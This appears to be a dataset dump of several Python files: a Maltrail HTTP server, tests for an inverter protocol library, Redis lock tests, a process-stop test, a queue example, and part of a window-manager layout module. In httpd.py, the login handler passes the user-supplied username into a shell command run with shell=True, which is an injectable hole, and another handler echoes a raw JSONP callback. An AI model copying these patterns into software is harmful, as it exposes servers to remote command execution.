source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
httpd.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2019 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
import BaseHTTPServer
import cStringIO
import datetime
import httplib
import glob
import gzip
import hashlib
import io
import json
import mimetypes
import os
import re
import socket
import SocketServer
import subprocess
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import addr_to_int
from core.addr import int_to_addr
from core.addr import make_mask
from core.attribdict import AttribDict
from core.common import get_regex
from core.common import ipcat_lookup
from core.common import worst_asns
from core.enums import HTTP_HEADER
from core.settings import config
from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS
from core.settings import DATE_FORMAT
from core.settings import DISABLED_CONTENT_EXTENSIONS
from core.settings import DISPOSED_NONCES
from core.settings import HTML_DIR
from core.settings import HTTP_TIME_FORMAT
from core.settings import MAX_NOFILE
from core.settings import NAME
from core.settings import PING_RESPONSE
from core.settings import SERVER_HEADER
from core.settings import SESSION_COOKIE_NAME
from core.settings import SESSION_COOKIE_FLAG_SAMESITE
from core.settings import SESSION_EXPIRATION_HOURS
from core.settings import SESSION_ID_LENGTH
from core.settings import SESSIONS
from core.settings import TRAILS_FILE
from core.settings import UNAUTHORIZED_SLEEP_TIME
from core.settings import VERSION
try:
# Reference: https://bugs.python.org/issue7980
# Reference: http://code-trick.com/python-bug-attribute-error-_strptime/
import _strptime
except ImportError:
pass
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE))
except:
pass
def start_httpd(address=None, port=None, join=False, pem=None):
"""
Starts HTTP server
"""
class ThreadingServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
BaseHTTPServer.HTTPServer.server_bind(self)
def finish_request(self, *args, **kwargs):
try:
BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class SSLThreadingServer(ThreadingServer):
def __init__(self, server_address, pem, HandlerClass):
import OpenSSL # python-openssl
ThreadingServer.__init__(self, server_address, HandlerClass)
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
ctx.use_privatekey_file(pem)
ctx.use_certificate_file(pem)
self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self, request):
try:
request.shutdown()
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class ReqHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
params = {}
content = None
skip = False
if hasattr(self, "data"):
params.update(urlparse.parse_qs(self.data))
if query:
params.update(urlparse.parse_qs(query))
for key in params:
if params[key]:
params[key] = params[key][-1]
if path == '/':
path = "index.html"
path = path.strip('/')
extension = os.path.splitext(path)[-1].lower()
if hasattr(self, "_%s" % path):
content = getattr(self, "_%s" % path)(params)
else:
path = path.replace('/', os.path.sep)
path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()
if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
path = "%s.html" % path
if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js":
content = open(path, "rb").read()
content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content)
self.send_response(httplib.OK)
elif ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
mtime = time.gmtime(os.path.getmtime(path))
if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)
if if_modified_since and extension not in (".htm", ".html"):
if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
self.send_response(httplib.NOT_MODIFIED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
skip = True
if not skip:
content = open(path, "rb").read()
last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)
self.send_header(HTTP_HEADER.CONTENT_SECURITY_POLICY, "default-src 'none'; style-src 'self' 'unsafe-inline'; img-src 'self'; "+
"script-src 'self' 'unsafe-eval' https://stat.ripe.net; connect-src 'self'; form-action 'self'; "+
"font-src 'self'; frame-src *; worker-src 'self'; block-all-mixed-content;")
if extension not in (".htm", ".html"):
self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555
else:
self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")
else:
self.send_response(httplib.NOT_FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
content = '<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]
if content is not None:
for match in re.finditer(r"<\!(\w+)\!>", content):
name = match.group(1)
_ = getattr(self, "_%s" % name.lower(), None)
if _:
content = self._format(content, **{ name: _() })
if "gzip" in self.headers.getheader(HTTP_HEADER.ACCEPT_ENCODING, ""):
self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
_ = cStringIO.StringIO()
compress = gzip.GzipFile("", "w+b", 9, _)
compress._stream = _
compress.write(content)
compress.flush()
compress.close()
content = compress._stream.getvalue()
self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))
self.end_headers()
if content:
self.wfile.write(content)
self.wfile.flush()
self.wfile.close()
def do_POST(self):
length = self.headers.getheader(HTTP_HEADER.CONTENT_LENGTH)
data = self.rfile.read(int(length))
data = urllib.unquote_plus(data)
self.data = data
self.do_GET()
def get_session(self):
retval = None
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
if SESSIONS[session].client_ip != self.client_address[0]:
pass
elif SESSIONS[session].expiration > time.time():
retval = SESSIONS[session]
else:
del SESSIONS[session]
return retval
def delete_session(self):
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
del SESSIONS[session]
def version_string(self):
return SERVER_HEADER
def end_headers(self):
if not hasattr(self, "_headers_ended"):
BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
self._headers_ended = True
def log_message(self, format, *args):
return
def finish(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _version(self):
return VERSION
def _format(self, content, **params):
if content:
for key, value in params.items():
content = content.replace("<!%s!>" % key, value)
return content
def _login(self, params):
valid = False
if params.get("username") and params.get("hash") and params.get("nonce"):
if params.get("nonce") not in DISPOSED_NONCES:
DISPOSED_NONCES.add(params.get("nonce"))
for entry in (config.USERS or []):
entry = re.sub(r"\s", "", entry)
username, stored_hash, uid, netfilter = entry.split(':')
if username == params.get("username"):
try:
if params.get("hash") == hashlib.sha256(stored_hash.strip() + params.get("nonce")).hexdigest():
valid = True
break
except:
if config.SHOW_DEBUG:
traceback.print_exc()
if valid:
session_id = os.urandom(SESSION_ID_LENGTH).encode("hex")
expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
cookie = "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration)))
if config.USE_SSL:
cookie += "; Secure"
if SESSION_COOKIE_FLAG_SAMESITE:
cookie += "; SameSite=strict"
self.send_header(HTTP_HEADER.SET_COOKIE, cookie)
if netfilter in ("", "0.0.0.0/0"):
netfilters = None
else:
addresses = set()
netmasks = set()
for item in set(re.split(r"[;,]", netfilter)):
item = item.strip()
if '/' in item:
_ = item.split('/')[-1]
if _.isdigit() and int(_) >= 16:
lower = addr_to_int(item.split('/')[0])
mask = make_mask(int(_))
upper = lower | (0xffffffff ^ mask)
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
else:
netmasks.add(item)
elif '-' in item:
_ = item.split('-')
lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
addresses.add(item)
netfilters = netmasks
if addresses:
netfilters.add(get_regex(addresses))
SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "expiration": expiration, "client_ip": self.client_address[0]})
else:
time.sleep(UNAUTHORIZED_SLEEP_TIME)
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = "Login %s" % ("success" if valid else "failed")
if not subprocess.mswindows:
try:
subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
return content
def _logout(self, params):
self.delete_session()
self.send_response(httplib.FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.LOCATION, "/")
def _whoami(self, params):
session = self.get_session()
username = session.username if session else ""
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return username
def _check_ip(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
try:
result_worst = worst_asns(params.get("address"))
if result_worst:
result_ipcat = result_worst
else:
_ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
result_ipcat = _[1] if _[0] == 'the' else _[0]
return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _trails(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return open(TRAILS_FILE, "rb").read()
def _ping(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return PING_RESPONSE
def _events(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
start, end, size, total = None, None, -1, None
content = None
log_exists = False
dates = params.get("date", "")
if ".." in dates:
pass
elif '_' not in dates:
try:
date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
if os.path.exists(event_log_path):
range_handle = open(event_log_path, "rb")
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
else:
logs_data = ""
date_interval = dates.split("_", 1)
try:
start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
for i in xrange(int((end_date - start_date).days) + 1):
date = start_date + datetime.timedelta(i)
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
if os.path.exists(event_log_path):
log_handle = open(event_log_path, "rb")
logs_data += log_handle.read()
log_handle.close()
range_handle = io.BytesIO(logs_data)
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
if log_exists:
range_handle.seek(0, 2)
total = range_handle.tell()
range_handle.seek(0)
if self.headers.get(HTTP_HEADER.RANGE):
match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
if match:
start, end = int(match.group(1)), int(match.group(2))
max_size = end - start + 1
end = min(total - 1, end)
size = end - start + 1
if start == 0 or not session.range_handle:
session.range_handle = range_handle
if session.netfilters is None:
session.range_handle.seek(start)
self.send_response(httplib.PARTIAL_CONTENT)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
content = session.range_handle.read(size)
else:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
buffer, addresses, netmasks, regex = cStringIO.StringIO(), set(), [], ""
for netfilter in session.netfilters:
if not netfilter:
continue
if '/' in netfilter:
netmasks.append(netfilter)
elif re.search(r"\A[\d.]+\Z", netfilter):
addresses.add(netfilter)
elif '\.' in netfilter:
regex = r"\b(%s)\b" % netfilter
else:
print "[!] invalid network filter '%s'" % netfilter
return
for line in session.range_handle:
display = False
ip = None
if regex:
match = re.search(regex, line)
if match:
ip = match.group(1)
display = True
if not display and (addresses or netmasks):
for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
if not display:
ip = match.group(1)
else:
break
if ip in addresses:
display = True
break
elif netmasks:
for _ in netmasks:
prefix, mask = _.split('/')
if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
addresses.add(ip)
display = True
break
if display:
if ",%s" % ip in line or "%s," % ip in line:
line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
buffer.write(line)
if buffer.tell() >= max_size:
break
content = buffer.getvalue()
end = start + len(content) - 1
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))
if len(content) < max_size:
session.range_handle.close()
session.range_handle = None
if size == -1:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.end_headers()
with range_handle as f:
while True:
data = f.read(io.DEFAULT_BUFFER_SIZE)
if not data:
break
else:
self.wfile.write(data)
else:
self.send_response(httplib.OK) # instead of httplib.NO_CONTENT (compatibility reasons)
self.send_header(HTTP_HEADER.CONNECTION, "close")
if self.headers.get(HTTP_HEADER.RANGE):
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")
return content
def _counts(self, params):
counts = {}
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")
match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
if match:
min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
min_ = datetime.datetime.fromtimestamp(0)
match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
if match:
max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
max_ = datetime.datetime.now()
min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)
for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
filename = os.path.basename(filepath)
if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
continue
try:
current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
else:
if min_ <= current <= max_:
timestamp = int(time.mktime(current.timetuple()))
size = os.path.getsize(filepath)
with open(filepath, "rb") as f:
content = f.read(io.DEFAULT_BUFFER_SIZE)
if size >= io.DEFAULT_BUFFER_SIZE:
total = 1.0 * content.count('\n') * size / io.DEFAULT_BUFFER_SIZE
counts[timestamp] = int(round(total / 100) * 100)
else:
counts[timestamp] = content.count('\n')
return json.dumps(counts)
class SSLReqHandler(ReqHandler):
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
try:
if pem:
server = SSLThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), pem, SSLReqHandler)
else:
server = ThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), ReqHandler)
except Exception as ex:
if "Address already in use" in str(ex):
exit("[!] another instance already running")
elif "Name or service not known" in str(ex):
exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
elif "Cannot assign requested address" in str(ex):
exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
else:
raise
print "[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1])
print "[o] running..."
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
|
test_inverter.py
|
"""Test cases for inverter.py."""
from io import BytesIO
from queue import Queue
from socket import socketpair, create_connection
from threading import Thread
from time import sleep
from unittest import TestCase
from samil.inverter import calculate_checksum, construct_message, Inverter, InverterEOFError, InverterFinder, \
InverterNotFoundError, read_message, KeepAliveInverter
class MessageTestCase(TestCase):
"""Test message construction/destruction functions."""
def test_checksum(self):
"""Tests checksum calculation."""
message = bytes.fromhex("55 aa 01 89 00 00 04 55 0c 00 00")
checksum = bytes.fromhex("01 ee")
self.assertEqual(checksum, calculate_checksum(message))
def test_construct(self):
"""Tests message construction."""
identifier = b'\x06\x01\x02'
payload = b'\x10\x10'
expect = bytes.fromhex("55 aa 06 01 02 00 02 10 10 01 2a")
self.assertEqual(expect, construct_message(identifier, payload))
def test_read(self):
"""Tests read_message function."""
f = BytesIO(bytes.fromhex("55 aa 06 01 02 00 02 10 10 01 2a"))
ident, payload = read_message(f)
self.assertEqual(b"\x06\x01\x02", ident)
self.assertEqual(b"\x10\x10", payload)
message = b"\x55\xaa\x00\x01\x02\x00\x00\x01\x02" # Sample inverter message
class InverterConnectionTestCase(TestCase):
"""Test low-level send/receive inverter messages over a socket connection.
These test cases exist mainly because the sockets might behave differently
in Windows.
"""
def setUp(self) -> None:
"""Creates socket pair for local (app) and remote (fake inverter) side."""
local_sock, remote_sock = socketpair() # We apparently can't use family=AF_INET on Linux
local_sock.settimeout(1.0)
remote_sock.settimeout(1.0)
self.inverter = Inverter(local_sock, None)
# This sock mimics the actual inverter, i.e. the remote side of the
# connection. Send messages on it to mimic the actual inverter sending
# messages to the Inverter class.
self.sock = remote_sock
def tearDown(self) -> None:
"""Closes the sockets to prevent warnings."""
self.inverter.sock.close()
self.sock.close()
def test_eof_on_send(self):
"""Tests if exception is raised on sending when connection is closed."""
self.sock.close() # Mimic inverter closed connection
with self.assertRaises((BrokenPipeError, ConnectionAbortedError)):
self.inverter.send(b"\x00\x01\x02", b"")
# For Windows it only raises an error on the second try and it
# raises ConnectionAbortedError instead of BrokenPipeError
self.inverter.send(b"\x00\x01\x02", b"")
def test_eof_on_recv(self):
"""Tests if exception is raised for closed connection when receiving."""
self.sock.close() # Mimic inverter closed connection
with self.assertRaises(InverterEOFError):
self.inverter.receive()
def test_multiple_messages_received_at_once(self):
"""Multiple messages might arrive at once for TCP sockets."""
# Send 2 messages
self.sock.send(message + message)
# Receive them back
ident, payload = self.inverter.receive()
self.assertEqual(b"\x00\x01\x02", ident)
self.assertEqual(b"", payload)
ident, payload = self.inverter.receive()
self.assertEqual(b"\x00\x01\x02", ident)
self.assertEqual(b"", payload)
def test_chopped_message(self):
"""Messages might arrive chopped for TCP sockets."""
queue = Queue()
# Receive the message in a separate thread, because it blocks
thread = Thread(target=lambda q: q.put(self.inverter.receive()), args=(queue,))
thread.start()
self.sock.send(message[0:1]) # Send some message parts
sleep(0.01)
self.sock.send(message[1:3])
sleep(0.01)
self.sock.send(message[3:7])
sleep(0.01)
self.sock.send(message[7:])
thread.join()
# Check result
ident, payload = queue.get(timeout=1.0)
self.assertEqual(b"\x00\x01\x02", ident)
self.assertEqual(b"", payload)
def test_send(self):
"""Tests whether a message from the app will arrive at the receiver."""
self.inverter.send(b"\x00\x01\x02", b"")
received_message = self.sock.recv(4096)
self.assertEqual(message, received_message)
def test_disconnect_multiple(self):
"""Tests if disconnect can be called multiple times."""
self.inverter.disconnect()
self.inverter.disconnect() # Should not raise exception
def test_disconnect_closed(self):
"""Tests if disconnect can be called on a closed socket."""
self.sock.close()
self.inverter.sock.close()
self.inverter.sock_file.close()
self.inverter.disconnect() # Should not raise exception
class InverterFinderTestCase(TestCase):
def test_inverter_not_found(self):
"""Tests if InverterNotFoundError is raised."""
with InverterFinder() as finder:
with self.assertRaises(InverterNotFoundError):
finder.find_inverter(advertisements=2, interval=0.01)
def test_new_connection(self):
"""Tests if a new connection is returned."""
with InverterFinder() as finder:
sock1 = create_connection(('127.0.0.1', 1200))
sock2, addr = finder.find_inverter()
# Test if the 2 sockets are paired
sock2.send(b"\x12")
self.assertEqual(b"\x12", sock1.recv(1))
sock1.close()
sock2.close()
def test_open_with_retries_exception(self):
"""Tests if OSError is thrown after all retries have failed."""
port_blocker = InverterFinder()
port_blocker.open()
with self.assertRaises(OSError):
finder = InverterFinder()
finder.open_with_retries(retries=2, period=0.01)
port_blocker.close()
def test_open_with_retries(self):
"""Tests if a retry happens when port is bound."""
# Bind port
port_blocker = InverterFinder()
port_blocker.open()
# Try binding port using retry function in separate thread
def try_bind(q: Queue):
finder = InverterFinder()
finder.open_with_retries(retries=10, period=0.01)
finder.close()
# If bind failed, an exception should've been thrown by now
# I assume the bind has succeeded here
q.put(True)
queue = Queue()
thread = Thread(target=try_bind, args=(queue,))
thread.start()
# Unbind port
sleep(0.01)
port_blocker.close()
# Check if bind succeeded
thread.join()
succeeded = queue.get(timeout=1.0)
self.assertTrue(succeeded)
class KeepAliveInverterTestCase(TestCase):
"""Tests for KeepAliveInverter class."""
def setUp(self) -> None:
"""Creates socket pair for local (app) and remote ('real' inverter) side."""
local_sock, remote_sock = socketpair()
local_sock.settimeout(1.0)
remote_sock.settimeout(1.0)
self.inverter = KeepAliveInverter(local_sock, None, keep_alive=0.01)
self.sock = remote_sock
def tearDown(self) -> None:
"""Closes the sockets to prevent warnings."""
self.inverter.disconnect()
self.sock.close()
def test_keep_alive_sent(self):
"""Tests if a keep-alive message gets send periodically."""
# Receive keep-alive message
msg = self.sock.recv(4096)
self.assertTrue(msg.startswith(b"\x55\xaa"))
# Send some arbitrary response
self.sock.send(bytes.fromhex("55 aa 01 02 02 00 00 01 04"))
# Receive another keep-alive message
msg = self.sock.recv(4096)
self.assertTrue(msg.startswith(b"\x55\xaa"))
# Send some arbitrary response
self.sock.send(bytes.fromhex("55 aa 01 02 02 00 00 01 04"))
def test_keep_alive_cancelled(self):
"""Tests if keep-alive messages are cancelled when other messages are sent."""
sleep(0.005) # Wait before a keep-alive message will be sent
self.inverter.send(b"\x01\x02\x03", b"") # Send something arbitrary
self.sock.recv(4096) # Retrieve the sent message
sleep(0.008) # Wait until just before the next keep-alive is supposed to happen
# Check that no message was sent
self.sock.setblocking(False)
with self.assertRaises(BlockingIOError):
self.sock.recv(4096)
def test_disconnect(self):
"""Tests if the keep-alive messages will stop cleanly."""
self.inverter.disconnect()
sleep(0.02)
|
stoppable_test.py
|
import os
import unittest
from signal import SIGINT
from time import sleep
from multiprocessing import Process
from rocky.process import stoppable
def nice_process():
with stoppable() as s:
while s.check_stop():
sleep(0.01)
def nasty_process():
with stoppable() as s:
while True:
sleep(0.01)
class Test(unittest.TestCase):
def test_nice_process_is_stopped_after_one_signal(self):
p = Process(target=nice_process)
try:
p.start()
sleep(0.01)
os.kill(p.pid, SIGINT)
p.join(1)
self.assertFalse(p.is_alive())
finally:
p.terminate()
def test_nasty_process_is_killed_on_fifth_signals(self):
if os.environ.get('TRAVIS'):
# This test fails intermittently in travis, probably due
# to some race condition between the processes.
return
p = Process(target=nasty_process)
try:
p.start()
for _ in range(4):
sleep(0.01)
os.kill(p.pid, SIGINT)
self.assertTrue(p.is_alive())
os.kill(p.pid, SIGINT)
p.join(1)
self.assertFalse(p.is_alive())
finally:
p.terminate()
|
test_lock.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 28 20:23:09 2015
@author: Eike
"""
from threading import Thread
import time
import tsdb
import redis
TESTDB=9
POOL = redis.ConnectionPool(host='localhost', port=6379, db=TESTDB)
def test_lock_twice_acquire_lt_lock_timeout():
lockname = 'a_key'
conn = redis.Redis(connection_pool=POOL)
identifier = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=10,
lock_timeout=3,
)
assert identifier is not False
result = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=2,
lock_timeout=2,
)
assert result == False
tsdb.release_lock(conn, lockname, identifier)
def test_lock_twice_acquire_gt_lock_timeout():
lockname = 'a_key'
conn = redis.Redis(connection_pool=POOL)
identifier = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=10,
lock_timeout=2,
)
assert identifier is not False
identifier2 = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=3,
lock_timeout=2,
)
assert identifier2 is not False
assert identifier != identifier2
tsdb.release_lock(conn, lockname, identifier2)
def test_lock_twice_and_release():
def acquire(acquire_timeout):
identifer2 = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=acquire_timeout,
lock_timeout=5,
)
assert identifer2 is not False
lockname = 'a_key'
conn = redis.Redis(connection_pool=POOL)
identifier = tsdb.acquire_lock_with_timeout(
conn=conn,
lockname=lockname,
acquire_timeout=10,
lock_timeout=20,
)
assert identifier is not False
t = Thread(target=acquire, args=(20, ))
t.start()
time.sleep(1)
tsdb.release_lock(conn, lockname, identifier)
|
genqueue.py
|
# genqueue.py
#
# Generate a sequence of items that put onto a queue
def consume_queue(thequeue):
while True:
item = thequeue.get()
if item is StopIteration:
break
yield item
# Example
if __name__ == '__main__':
import queue,threading
def consumer(q):
for item in consume_queue(q):
print("Consumed", item)
print("done")
in_q = queue.Queue()
con_thr = threading.Thread(target=consumer,args=(in_q,))
con_thr.start()
# Now, pipe a bunch of data into the queue
for i in range(100):
in_q.put(i)
in_q.put(StopIteration)
|
layout.py
|
from __future__ import annotations
from typing import Optional, Callable, TYPE_CHECKING, TypeVar, Union, Any, cast
import time
import math
import logging
import subprocess
import os
from itertools import product
from threading import Thread
from pywm import (
PyWM,
PyWMOutput,
PyWMDownstreamState,
PYWM_MOD_CTRL,
PYWM_PRESSED,
PYWM_MOD_ALT,
PYWM_MOD_LOGO
)
from pywm.touchpad import (
TwoFingerSwipePinchGesture,
HigherSwipeGesture,
SingleFingerMoveGesture
)
from pywm.touchpad.gestures import Gesture
from .state import LayoutState, WorkspaceState
from .interpolation import LayoutDownstreamInterpolation
from .animate import Animate
from .view import View
from .config import configured_value, load_config, print_config
from .key_processor import KeyProcessor
from .panel_endpoint import PanelEndpoint
from .panel_launcher import PanelsLauncher
from .sys_backend import SysBackend, SysBackendEndpoint
from .auth_backend import AuthBackend
from .widget import (
TopBar,
BottomBar,
Background,
Corner
)
from .overlay import (
Overlay,
MoveResizeOverlay,
MoveResizeFloatingOverlay,
SwipeOverlay,
SwipeToZoomOverlay,
LauncherOverlay,
)
logger = logging.getLogger(__name__)
conf_mod = configured_value('mod', PYWM_MOD_LOGO)
conf_pywm = configured_value('pywm', cast(dict[str, Any], {}))
conf_outputs = configured_value('outputs', cast(list[dict[str, Any]], []))
conf_send_fullscreen_to_views = configured_value('view.send_fullscreen', True)
if TYPE_CHECKING:
TKeyBindings = Callable[[Layout], list[tuple[str, Callable[[], None]]]]
else:
TKeyBindings = TypeVar('TKeyBindings')
conf_key_bindings = configured_value('key_bindings', cast(TKeyBindings, lambda layout: []))
conf_sys_backend_endpoints = configured_value('sys_backend_endpoints', cast(list[SysBackendEndpoint], []))
conf_lp_freq = configured_value('gestures.lp_freq', 60.)
conf_lp_inertia = configured_value('gestures.lp_inertia', .8)
conf_two_finger_min_dist = configured_value('gestures.two_finger_min_dist', .1)
conf_validate_threshold = configured_value('gestures.validate_threshold', .02)
conf_anim_t = configured_value('anim_time', .3)
conf_blend_t = configured_value('blend_time', 1.)
conf_power_times = configured_value('power_times', [120, 300, 600])
conf_suspend_command = configured_value('suspend_command', "systemctl suspend")
conf_on_startup = configured_value('on_startup', lambda: None)
conf_on_reconfigure = configured_value('on_reconfigure', lambda: None)
conf_lock_on_wakeup = configured_value('lock_on_wakeup', True)
conf_bar_enabled = configured_value('bar.enabled', True)
